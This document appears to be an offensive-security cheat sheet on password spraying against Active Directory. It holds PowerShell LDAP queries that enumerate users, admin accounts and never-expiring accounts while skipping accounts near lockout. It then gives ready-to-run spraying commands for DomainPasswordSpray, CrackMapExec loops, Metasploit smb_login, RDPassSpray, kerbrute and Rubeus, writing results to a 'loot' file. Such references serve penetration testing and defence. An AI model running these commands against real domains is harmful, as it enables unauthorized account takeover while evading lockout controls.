Password Spray

Password spray

List targets

Users list

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(badpwdcount<=<max_lockout_attempt - 2>))").FindAll().Properties.samaccountname

Administrators list

Default protected administrative groups in Active Directory:

  • Enterprise Admins
  • Schema Admins
  • Domain Admins
  • Administrators
  • Account Operators
  • Server Operators
  • Print Operators
  • Backup Operators
  • Cert Publishers
  • Domain Controllers
  • Read-Only Domain Controllers
  • Replicator

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Never expired accounts

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties | ForEach-Object{ if (($_.useraccountcontrol[0] -band 0x00010000) -and -not ($_.useraccountcontrol[0] -band 0x00000002)){ Write-Host $_.cn}}

Clean and safe list without disabled or potential lockouts accounts
https://github.com/dafthack/DomainPasswordSpray
https://github.com/mdavis332/DomainPasswordSpray (FORKED USES KERBEROS AUTH !)

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts
Attacks

PowerShell

Invoke-DomainPasswordSpray -Force [-UserList <users.txt>] -Domain <domain_name> [-PasswordList <passlist.txt> | -Password <password>] -OutFile <loot.txt>
Invoke-DomainPasswordSpray -Force -Domain <domain_name> -Password <password> -OutFile <loot.txt>
Invoke-DomainPasswordSpray -Force -UsernameAsPassword -OutFile <loot.txt>

.NET

https://github.com/ustayready/SharpHose - NOT TESTED

CME

while read user; do crackmapexec <range> -u $user -p <password> -d <domain>; done < <users.txt>
while read user; do crackmapexec <range> -u $user -p $user -d <domain>; done < <users.txt>

MSF

use auxiliary/scanner/smb/smb_login

RDPassSpray
https://github.com/xFreed0m/RDPassSpray

python3 RDPassSpray.py -U <users.txt> -p <password> -d <domain> -t <host>

Kerberos methods

python kerbrute.py -domain <domain> -users <users.txt> -passwords <dico.txt> -outputfile <out>

Rubeus.exe brute [/users:<users.txt>] /passwords:<dico.txt> [/domain:<domain>] /outfile:<out>
Rubeus.exe brute /password:<password> /noticket

Azure / O365 - NOT TESTED